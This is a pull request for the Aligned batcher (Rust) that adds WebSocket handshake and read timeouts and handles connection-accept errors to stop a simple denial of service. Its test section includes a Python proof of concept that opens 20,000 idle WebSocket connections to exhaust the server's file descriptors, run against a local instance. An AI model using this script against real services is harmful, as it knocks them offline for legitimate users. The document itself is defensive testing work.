### PR TITLE
fix: batcher timeout to prevent simple DoS

### DIFF
--- a/batcher/aligned-batcher/src/lib.rs
+++ b/batcher/aligned-batcher/src/lib.rs
@@ -23,7 +23,7 @@ use std::time::Duration;
 
 use aligned_sdk::core::constants::{
     ADDITIONAL_SUBMISSION_GAS_COST_PER_PROOF, AGGREGATOR_GAS_COST, BUMP_BACKOFF_FACTOR,
-    BUMP_MAX_RETRIES, BUMP_MAX_RETRY_DELAY, BUMP_MIN_RETRY_DELAY, CONNECTION_READ_TIMEOUT,
+    BUMP_MAX_RETRIES, BUMP_MAX_RETRY_DELAY, BUMP_MIN_RETRY_DELAY, CONNECTION_TIMEOUT,
     CONSTANT_GAS_COST, DEFAULT_AGGREGATOR_FEE_PERCENTAGE_MULTIPLIER, DEFAULT_MAX_FEE_PER_PROOF,
     ETHEREUM_CALL_BACKOFF_FACTOR, ETHEREUM_CALL_MAX_RETRIES, ETHEREUM_CALL_MAX_RETRY_DELAY,
     ETHEREUM_CALL_MIN_RETRY_DELAY, GAS_PRICE_PERCENTAGE_MULTIPLIER, PERCENTAGE_DIVIDER,
@@ -267,13 +267,18 @@ impl Batcher {
             .map_err(|e| BatcherError::TcpListenerError(e.to_string()))?;
         info!("Listening on: {}", address);
 
-        // Let's spawn the handling of each connection in a separate task.
-        while let Ok((stream, addr)) = listener.accept().await {
-            self.metrics.open_connections.inc();
-            let batcher = self.clone();
-            tokio::spawn(batcher.handle_connection(stream, addr));
+        loop {
+            match listener.accept().await {
+                Ok((stream, addr)) => {
+                    self.metrics.open_connections.inc();
+                    let batcher = self.clone();
+                    // Let's spawn the handling of each connection in a separate task.
+                    tokio::spawn(batcher.handle_connection(stream, addr));
+                    self.metrics.open_connections.dec();
+                }
+                Err(e) => error!("Couldn't accept new connection: {}", e),
+            }
         }
-        Ok(())
     }
 
     /// Listen for Ethereum new blocks.
@@ -362,7 +367,20 @@ impl Batcher {
         addr: SocketAddr,
     ) -> Result<(), BatcherError> {
         info!("Incoming TCP connection from: {}", addr);
-        let ws_stream = tokio_tungstenite::accept_async(raw_stream).await?;
+
+        let ws_stream_future = tokio_tungstenite::accept_async(raw_stream);
+        let ws_stream =
+            match timeout(Duration::from_secs(CONNECTION_TIMEOUT), ws_stream_future).await {
+                Ok(Ok(stream)) => stream,
+                Ok(Err(e)) => {
+                    warn!("Error while establishing websocket connection: {}", e);
+                    return Ok(());
+                }
+                Err(e) => {
+                    warn!("Error while establishing websocket connection: {}", e);
+                    return Ok(());
+                }
+            };
 
         debug!("WebSocket connection established: {}", addr);
         let (outgoing, incoming) = ws_stream.split();
@@ -383,25 +401,23 @@ impl Batcher {
 
         let mut incoming_filter = incoming.try_filter(|msg| future::ready(msg.is_binary()));
         let future_msg = incoming_filter.try_next();
+
         // timeout to prevent a DOS attack
-        match timeout(Duration::from_secs(CONNECTION_READ_TIMEOUT), future_msg).await {
+        match timeout(Duration::from_secs(CONNECTION_TIMEOUT), future_msg).await {
             Ok(Ok(Some(msg))) => {
                 self.clone().handle_message(msg, outgoing.clone()).await?;
             }
             Err(elapsed) => {
                 warn!("[{}] {}", &addr, elapsed);
-                self.metrics.open_connections.dec();
                 self.metrics.user_error(&["user_timeout", ""]);
                 return Ok(());
             }
             Ok(Ok(None)) => {
                 info!("[{}] Connection closed by the other side", &addr);
-                self.metrics.open_connections.dec();
                 return Ok(());
             }
             Ok(Err(e)) => {
                 error!("Unexpected error: {}", e);
-                self.metrics.open_connections.dec();
                 return Ok(());
             }
         };
@@ -417,7 +433,6 @@ impl Batcher {
             Ok(_) => info!("{} disconnected", &addr),
         }
 
-        self.metrics.open_connections.dec();
         Ok(())
     }
 

--- a/batcher/aligned-batcher/src/lib.rs
+++ b/batcher/aligned-batcher/src/lib.rs
@@ -378,6 +378,7 @@ impl Batcher {
                 }
                 Err(e) => {
                     warn!("Error while establishing websocket connection: {}", e);
+                    self.metrics.user_error(&["user_timeout", ""]);
                     return Ok(());
                 }
             };

--- a/batcher/aligned-batcher/src/lib.rs
+++ b/batcher/aligned-batcher/src/lib.rs
@@ -274,7 +274,10 @@ impl Batcher {
                     // Let's spawn the handling of each connection in a separate task.
                     tokio::spawn(batcher.handle_connection(stream, addr));
                 }
-                Err(e) => error!("Couldn't accept new connection: {}", e),
+                Err(e) => {
+                    self.metrics.user_error(&["connection_accept_error", ""]);
+                    error!("Couldn't accept new connection: {}", e);
+                }
             }
         }
     }

--- a/batcher/aligned-batcher/src/lib.rs
+++ b/batcher/aligned-batcher/src/lib.rs
@@ -389,7 +389,7 @@ impl Batcher {
                 self.clone().handle_message(msg, outgoing.clone()).await?;
             }
             Err(elapsed) => {
-                error!("[{}] {}", &addr, elapsed);
+                warn!("[{}] {}", &addr, elapsed);
                 self.metrics.open_connections.dec();
                 self.metrics.user_error(&["user_timeout", ""]);
                 return Ok(());

--- a/batcher/aligned-batcher/src/lib.rs
+++ b/batcher/aligned-batcher/src/lib.rs
@@ -23,8 +23,8 @@ use std::time::Duration;
 
 use aligned_sdk::core::constants::{
     ADDITIONAL_SUBMISSION_GAS_COST_PER_PROOF, AGGREGATOR_GAS_COST, BUMP_BACKOFF_FACTOR,
-    BUMP_MAX_RETRIES, BUMP_MAX_RETRY_DELAY, BUMP_MIN_RETRY_DELAY, CONSTANT_GAS_COST,
-    DEFAULT_AGGREGATOR_FEE_PERCENTAGE_MULTIPLIER, DEFAULT_MAX_FEE_PER_PROOF,
+    BUMP_MAX_RETRIES, BUMP_MAX_RETRY_DELAY, BUMP_MIN_RETRY_DELAY, CONNECTION_READ_TIMEOUT,
+    CONSTANT_GAS_COST, DEFAULT_AGGREGATOR_FEE_PERCENTAGE_MULTIPLIER, DEFAULT_MAX_FEE_PER_PROOF,
     ETHEREUM_CALL_BACKOFF_FACTOR, ETHEREUM_CALL_MAX_RETRIES, ETHEREUM_CALL_MAX_RETRY_DELAY,
     ETHEREUM_CALL_MIN_RETRY_DELAY, GAS_PRICE_PERCENTAGE_MULTIPLIER, PERCENTAGE_DIVIDER,
     RESPOND_TO_TASK_FEE_LIMIT_PERCENTAGE_MULTIPLIER,
@@ -384,7 +384,7 @@ impl Batcher {
         let mut incoming_filter = incoming.try_filter(|msg| future::ready(msg.is_binary()));
         let future_msg = incoming_filter.try_next();
         // timeout to prevent a DOS attack
-        match timeout(Duration::from_secs(5), future_msg).await {
+        match timeout(Duration::from_secs(CONNECTION_READ_TIMEOUT), future_msg).await {
             Ok(Ok(Some(msg))) => {
                 self.clone().handle_message(msg, outgoing.clone()).await?;
             }

--- a/batcher/aligned-sdk/src/core/constants.rs
+++ b/batcher/aligned-sdk/src/core/constants.rs
@@ -8,7 +8,7 @@ pub const CONSTANT_GAS_COST: u128 =
         + BATCHER_SUBMISSION_BASE_GAS_COST;
 pub const DEFAULT_MAX_FEE_PER_PROOF: u128 =
     ADDITIONAL_SUBMISSION_GAS_COST_PER_PROOF * 100_000_000_000; // gas_price = 100 Gwei = 0.0000001 ether (high gas price)
-pub const CONNECTION_READ_TIMEOUT: u64 = 60; // 1 minute
+pub const CONNECTION_TIMEOUT: u64 = 2; // 2 secs
 
 // % modifiers: (100% is x1, 10% is x0.1, 1000% is x10)
 pub const RESPOND_TO_TASK_FEE_LIMIT_PERCENTAGE_MULTIPLIER: u128 = 250; // fee_for_aggregator -> respondToTaskFeeLimit modifier

--- a/batcher/aligned-sdk/src/core/constants.rs
+++ b/batcher/aligned-sdk/src/core/constants.rs
@@ -8,6 +8,7 @@ pub const CONSTANT_GAS_COST: u128 =
         + BATCHER_SUBMISSION_BASE_GAS_COST;
 pub const DEFAULT_MAX_FEE_PER_PROOF: u128 =
     ADDITIONAL_SUBMISSION_GAS_COST_PER_PROOF * 100_000_000_000; // gas_price = 100 Gwei = 0.0000001 ether (high gas price)
+pub const CONNECTION_READ_TIMEOUT: u64 = 60; // 1 minute
 
 // % modifiers: (100% is x1, 10% is x0.1, 1000% is x10)
 pub const RESPOND_TO_TASK_FEE_LIMIT_PERCENTAGE_MULTIPLIER: u128 = 250; // fee_for_aggregator -> respondToTaskFeeLimit modifier

--- a/batcher/aligned-sdk/src/core/constants.rs
+++ b/batcher/aligned-sdk/src/core/constants.rs
@@ -8,7 +8,7 @@ pub const CONSTANT_GAS_COST: u128 =
         + BATCHER_SUBMISSION_BASE_GAS_COST;
 pub const DEFAULT_MAX_FEE_PER_PROOF: u128 =
     ADDITIONAL_SUBMISSION_GAS_COST_PER_PROOF * 100_000_000_000; // gas_price = 100 Gwei = 0.0000001 ether (high gas price)
-pub const CONNECTION_TIMEOUT: u64 = 2; // 2 secs
+pub const CONNECTION_TIMEOUT: u64 = 5; // 5 secs
 
 // % modifiers: (100% is x1, 10% is x0.1, 1000% is x10)
 pub const RESPOND_TO_TASK_FEE_LIMIT_PERCENTAGE_MULTIPLIER: u128 = 250; // fee_for_aggregator -> respondToTaskFeeLimit modifier


### PR DESCRIPTION
# Batcher timeout to prevent simple DOS

## Description

Handles simple DOS attack to the Batcher.

1. Modifies `listener.accept()` to handle error cases.
2. Adds a timeout to the WebSocket handshake.
3. Adds a timeout to the read of the first user message.

## How To Test

### Test with SDK

1. Edit the SDK code to sleep before sending the `getNonce` message in `batcher/aligned-sdk/src/sdk.rs:590`
```Rust
let msg_bin = cbor_serialize(&msg)
        .map_err(|_| GetNonceError::SerializationError("Failed to serialize msg".to_string()))?;

info!("Sleeping to keep the wb blocked.");
sleep(Duration::from_secs(70)).await;
info!("Waking up");
```
`tokio::time::sleep` and `std::time::Duration` should be imported.

4. Start anvil:
```bash
make anvil_start_with_block_time
```
5. Start batcher:
```bash
make batcher_start_local
```
6. Start grafana metrics:
```bash
make run_metrics
```
7. Run the SDK:
```bash
make batcher_send_risc0_task
```

You should be able to see that the Batcher is cancelling the connection in the logs:
```bash
2024-11-25T18:24:50Z WARN aligned_batcher] [127.0.0.1:51905] deadline has elapsed
```

Also, check the **User Error Count** panel in the Batcher Grafana Dashboard in `localhost:3000`:

<img width="685" alt="image" src="https://github.com/user-attachments/assets/eb2af8b2-0434-4893-8cd1-d61afee66144">

### Using python script

1. Change the file descriptor limit for the PoC (in `Makefile` let’s add `ulimit -n 1000 &&`).

  ```bash
   ...

   batcher_start_local: user_fund_payment_service
   	@echo "Starting Batcher..."
   	@$(MAKE) run_storage &
   	@ulimit -n 200 && cargo run --manifest-path ./batcher/aligned-batcher/Cargo.toml --release -- --config ./config-files/config-batcher.yaml --env-file ./batcher/aligned-batcher/.env.dev

   ...
   ```

2. Create the following script `script_poc.py`:
```python
import asyncio
import websockets

async def attack(target_url, delay, num_connections):
   async def open_connection():
       try:
           async with websockets.connect(target_url) as websocket:
               await asyncio.sleep(delay)
       except Exception as e:
           print(f"Connection failed: {e}")

   tasks = []
   for _ in range(num_connections):
       tasks.append(open_connection())
   await asyncio.gather(*tasks)

target_url = "ws://localhost:8080"
delay = 300000
num_connections = 20000

asyncio.run(attack(target_url, delay, num_connections))
```

3. Run in 3 different terminals:
```Bash
make anvil_start_with_block_time
make batcher_start_local
(Wait until the batcher has the port 8080 open) python script_poc.py
```

You should see that the Batcher doesn't finish execution and logs the following:
```bash
2024-11-25T21:27:08Z ERROR aligned_batcher] Couldn't accept new connection: Too many open files (os error 24)
[2024-11-25T21:27:11Z WARN  aligned_batcher] [127.0.0.1:60786] deadline has elapsed
```
Also check that the Batcher can accept new connections after the attack.

_You should also test normal usage._

## Type of change

- [x] Bug fix

## Checklist

- [ ] “Hotfix” to `testnet`, everything else to `staging`
- [ ] Linked to Github Issue
- [ ] This change depends on code or research by an external entity
  - [ ] Acknowledgements were updated to give credit
- [ ] Unit tests added
- [ ] This change requires new documentation.
  - [ ] Documentation has been added/updated.
- [ ] This change is an Optimization
  - [ ] Benchmarks added/run
- [ ] Has a known issue
  - [Link to the open issue addressing it]() 
- [ ] If your PR changes the Operator compatibility (Ex: Upgrade prover versions)
  - [ ] This PR adds compatibility for operator for both versions and do not change batcher/docs/examples
  - [ ] This PR updates batcher and docs/examples to the newer version. This requires the operator are already updated to be compatible
